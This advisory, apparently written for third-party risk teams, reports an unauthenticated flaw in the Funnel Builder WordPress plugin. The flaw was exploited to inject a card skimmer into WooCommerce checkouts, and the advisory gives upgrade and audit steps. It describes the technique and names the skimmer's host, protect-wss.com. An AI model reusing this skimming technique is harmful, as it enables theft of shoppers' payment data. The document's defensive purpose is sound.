Critical Funnel Builder WordPress Plugin Flaw Enables Credit‑Card Skimming on 40k WooCommerce Sites
What Happened – A zero‑authentication vulnerability in the Funnel Builder plugin for WordPress (pre‑3.15.0.3) was weaponised to inject malicious JavaScript into WooCommerce checkout pages. The injected script loads a remote skimmer that harvests full payment‑card details and billing data.
Why It Matters for TPRM –
- The plugin is deployed on >40,000 e‑commerce sites, creating a massive supply‑chain exposure.
- Attackers can steal PCI‑sensitive data without any user interaction, bypassing traditional web‑application firewalls.
- The breach demonstrates how a single third‑party component can compromise the entire merchant ecosystem.
Who Is Affected – Retail & e‑commerce organisations using WordPress/WooCommerce that have the Funnel Builder plugin installed (any industry that runs an online store).
Recommended Actions –
- Verify whether the Funnel Builder plugin is present on any managed sites.
- Immediately upgrade to version 3.15.0.3 or later via the WordPress dashboard.
- Audit the “External Scripts” setting for rogue entries and remove any unknown URLs.
- Conduct a PCI‑DSS scope review to ensure that any compromised sites are re‑validated.
Technical Notes – The flaw is an unauthenticated “settings‑tampering” bug that lets an attacker write arbitrary JavaScript to the plugin’s global “External Scripts” field. The malicious payload masquerades as a Google Tag Manager script and opens a WebSocket to protect-wss.com, delivering a custom card‑skimmer that captures card numbers, CVVs, billing addresses, and other PII. No CVE ID has been assigned yet. Source: BleepingComputer